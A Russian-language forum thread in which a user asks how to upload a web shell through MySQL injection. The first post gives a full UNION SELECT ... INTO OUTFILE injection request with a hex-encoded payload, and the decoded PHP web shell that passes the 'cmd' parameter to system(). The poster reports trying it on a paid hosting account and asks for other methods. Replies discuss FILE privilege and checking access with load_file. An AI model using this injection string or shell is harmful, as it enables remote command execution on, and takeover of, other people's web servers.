Хотел потренироваться в заливке шелла.
Написал бажный скрипт, сформировал запрос
test.php?id=2'+union+select+'/*','*/',0x3C3F706870206966202869737365742028245F4745545B 27636D64275D292920206563686F2073797374656D2028245F 4745545B27636D64275D293B203F3E,'/*',5,6,7,'*/'+INTO+OUTFILE+%22/home/test/public_html/shell.php%22/*
где 0x3C3F... это
<?php if (isset ($_GET['cmd'])) echo system ($_GET['cmd']); ?>
На localhost все прекрасно работает.
Заливаю на полноценный платный хостинг потестить,естественно меняю путь ... но результата нет.
Возможно это из-за отсутствия прав FILE ?
Есть ли другие способы заливки шелла,основанные на использовании MySQL Injection ?


P.S.Если разместил не в том разделе, пожалуйста перенесите.

magic_quotes=on
И на хостингах file_priv у рутов только. Таким способом не зальешь

Нет magic_quotes выключенны.
Подскажите,что не так.
Есть ли еще способы заливки шелла через mysql ?

проверь файл прив если есть доступ к mysql.user

проверь файл прив если есть доступ к mysql.user
К сожалению не могу проверить.
ERROR 1044 (42000): Access denied for user '*****'@'***.**.**.**' to database 'mysql'
Подозреваю, что файл прива нет :-(
Заливка шелла в mysql основана только на select into outfile ? Либо есть еще варианты ?

Эмм... а почему в information_schema.tables не залить ? (гавно вопрос,но ладно) )))

Велемир, что ты собрался заливать в таблицу?

хз )))))))))))))))))))))))))))ыыыыыы )))

есть несколько способов, но на все нужны fil_priv. Проверить иожно легче запросом c load_file